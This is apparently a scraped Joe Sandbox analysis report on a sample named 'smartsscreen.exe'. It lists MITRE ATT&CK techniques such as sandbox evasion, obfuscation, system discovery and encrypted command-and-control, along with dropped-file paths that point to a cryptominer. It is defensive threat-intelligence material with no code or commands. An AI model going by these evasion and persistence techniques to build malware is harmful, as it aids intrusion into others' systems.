Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer ) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Deletion
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report smartsscreen.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

PCAP (Network Traffic)

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Snort Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Bitcoin Miner

Compliance

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\Desktop\32f5c1eec1ca463f8755c717d6e69bf8$dpx$.tmp\85c52a8e2c82a64aa548c49d685fe8f4.tmp

C:\Users\user\Desktop\68541119c9044a71965dd10779c37578$dpx$.tmp\e05c47e9a5ef7741a882c017cc284dab.tmp

C:\Users\user\Desktop\78996cc0913e428592859084f14a5a0d$dpx$.tmp\8e77f5e1bc39c6408349bc8b0bfbe6cb.tmp

C:\Users\user\Desktop\WinRing0x64.png

C:\Users\user\Desktop\WinRing0x64.sys (copy)

C:\Users\user\Desktop\config.json

C:\Users\user\Desktop\curl.exe (copy)

C:\Users\user\Desktop\curl.png

C:\Users\user\Desktop\taskhostw.exe (copy)

C:\Users\user\Desktop\taskhostw.png

C:\Windows\Logs\DPX\setupact.log

C:\Windows\System32\drivers\72f5dad3d3e346df92d05eb16b52df1c$dpx$.tmp\0bfdc61464f46f4e9af5455e9b3ded61.tmp

Windows Analysis Report
smartsscreen.exe

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre